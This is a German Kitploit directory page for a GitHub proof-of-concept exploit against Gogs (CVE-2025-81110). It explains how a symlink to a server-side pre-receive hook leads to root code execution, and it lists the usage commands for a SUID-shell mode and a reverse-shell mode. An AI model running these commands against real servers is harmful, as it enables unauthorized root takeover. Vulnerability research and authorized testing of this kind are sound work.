Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-81110-PoC — Unsachgemäße Handhabung symbolischer Links in der PutContents-API in Gogs ermöglicht die lokale Ausführung von Code. | Kitploit
Tools/GitHubGitHub/bridgeralderson/cve-2025-81110-poc
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubbridgeralderson/cve-2025-81110-poc

CVE-2025-81110-PoC

Unsachgemäße Handhabung symbolischer Links in der PutContents-API in Gogs ermöglicht die lokale Ausführung von Code.

Repository anzeigen
41vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-81110-PoC

Unsachgemäße Behandlung von symbolischen Verknüpfungen in der PutContents-API in Gogs ermöglicht lokale Codeausführung.

Dieses Repository enthält einen professionellen Exploit für eine kritische Schwachstelle in Gogs-Versionen vor 0.13.0. Der Exploit nutzt einen logischen Fehler aus, bei dem die Gogs-API beim Aktualisieren von Repository-Inhalten keine Dateitypen validiert. Durch das Einfügen einer symbolischen Verknüpfung, die auf serverseitige Git-Hooks (pre-receive) zeigt, kann ein authentifizierter Benutzer den Inhalt des Hooks mit einem bösartigen Skript überschreiben. Nachfolgende Git-Push-Operationen lösen die Ausführung dieses Skripts im Kontext des Benutzers aus, der den Gogs-Dienst ausführt (normalerweise root).

Symlink-Injektion: Der Angreifer pusht eine symbolische Verknüpfung, die auf interne Repository-Hooks zeigt (z. B. /root/gogs-repositories//.git/hooks/pre-receive).

API-Überschreibung: Die Gogs-API erlaubt das Aktualisieren des Inhalts der symbolischen Verknüpfung. Da das Betriebssystem während des Schreibvorgangs der Verknüpfung folgt, wird der interne Git-Hook überschrieben.

RCE / Privilegieneskalation: Ein nachfolgender Git-Push löst den pre-receive-Hook aus. Wenn Gogs mit RUN_USER = root konfiguriert ist, erhält der Angreifer die vollständige Systemkontrolle.

Anforderungen

  • Python 3.x
  • requests-Bibliothek
  • git-Befehlszeilentool auf dem Angreifer-Rechner installiert

VERWENDUNG

SUID-Modus

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode suid

Nach Abschluss root-Zugriff auf dem Ziel erlangen:

root@kitploit:~
/tmp/rootbash -p

REVSHELL

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode rev --lhost <your_ip> --lport 4444

Argument-Referenz

Haftungsausschluss

Dieses Tool dient nur zu Bildungszwecken und für autorisierte Sicherheitsprüfungen. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool an Systemen verursacht werden, die Ihnen gehören oder für die Sie ausdrücklich die Erlaubnis zum Testen haben.

Tool herunterladen
ArgumentErforderlichBeschreibung
--urlJaDie Basis-URL der Gogs-Instanz (z. B. http://127.0.0.1:3001).
--userJaGültiger Benutzername für die Authentifizierung.
--passJaGültiges Passwort für den angegebenen Benutzer.
--modeNeinExploit-Modus: suid (erzeugt /tmp/rootbash) oder rev (Reverse Shell).
--lhostNeinLokale IP-Adresse für den Reverse-Shell-Rückruf.
--lportNeinLokaler Port für den Reverse-Shell-Listener.